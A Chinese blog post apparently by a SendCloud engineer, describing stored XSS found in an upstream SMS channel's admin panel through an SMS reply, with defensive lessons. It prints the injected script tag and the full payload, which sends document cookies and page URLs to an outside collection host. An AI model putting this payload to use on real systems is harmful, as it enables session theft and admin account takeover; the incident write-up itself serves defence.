某用户委托安全公司对本司(SendCloud)短信发送业务做安全检测,发现咱们的上游通道某一环节的安全漏洞。
跟踪这个过程,真的十分有趣。
这是 XSS 第一次发生在我身边,怎么也不会想到有人会犯这么弱智的错误。最基本的页面输出转义都没做。
页面内容输出转义、SQL 防注入、表单的 CSRF token 校验,应该算是 Web 站点搭建的基础工作吧!
过程
- 用户通过我们的短信服务往安全公司指定手机号推送消息
- 安全公司回复以下内容(会经过运营商反馈给通道):
3. 上游通道后台管理页面未做处理,admin 用户登录之后,查看短信回复内容页面时,页面直接输出了回复内容,导致 XSS —— 站外不安全脚本被加载执行。<script src=https://xss.chinacycc.com/EDQmSg?1554797849></script>
- 脚本获取重要信息(
document.location.href
,top.location.href
,document.cookie
,window.opener.location.href
),发送给指定地址。 - 安全公司利用 Cookie 直接就访问了上游通道的后台,而且还是最高权限。
...
我们利用用户反馈过来的这段信息,同样登录了这个后台,确认后台真的加载了这段 JS。
估计是框架拦截请求,采用 jquery 加载,还加上了时间戳。
请求伪造了一个图片请求用于上传数据。
经验与教训
- 自身业务安全性之外,应该经常做全链路的业务安全性检测,不能让用户对我们的业务安全性产生质疑。
数据泄露真的是太严重了,如果是恶意的,那...
之前没人注意到这个问题,是更可怕的事情。 - 我就在中网讯通后台这么闲逛,他们就是没有任何感觉(我们已经通过正常途径在通知他们了)。
除了基础的防范手段之外,应该:- 管理后台尽量不要暴露到公网
- 尽量一个用户只允许在一个地方登录
- 记录用户登录信息,连用户账号的认证错误都记下来
- 将 IP、UserAgent 等指纹数据和 SESSION ID 关联起来,除了使用 SESSION ID 检验之外,还应该判断这些指纹数据能不能匹配得上。(好像淘宝网,还是哪里,有一个 JS 专门用来计算 B 端指纹,对反爬也有帮助)
- 对管理后台的疑似非正常登录(不是之前常用 IP,浏览器等)应该有告警,并立即处理。
- ...先就说这么多吧
附:脚本
(function(){(new Image()).src='http://xss.chinacycc.com/index.php?do=api&id=EDQmSg&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='https://xss.chinacycc.com/index.php?do=keepsession&id=EDQmSg&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
格式化之后
(function() {
(new Image()).src = 'http://xss.chinacycc.com/index.php?do=api&id=EDQmSg&location=' + escape((function() {
try {
return document.location.href
} catch(e) {
return ''
}
})()) + '&toplocation=' + escape((function() {
try {
return top.location.href
} catch(e) {
return ''
}
})()) + '&cookie=' + escape((function() {
try {
return document.cookie
} catch(e) {
return ''
}
})()) + '&opener=' + escape((function() {
try {
return (window.opener && window.opener.location.href) ? window.opener.location.href: ''
} catch(e) {
return ''
}
})());
})();
if ('' == 1) {
keep = new Image();
keep.src = 'https://xss.chinacycc.com/index.php?do=keepsession&id=EDQmSg&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};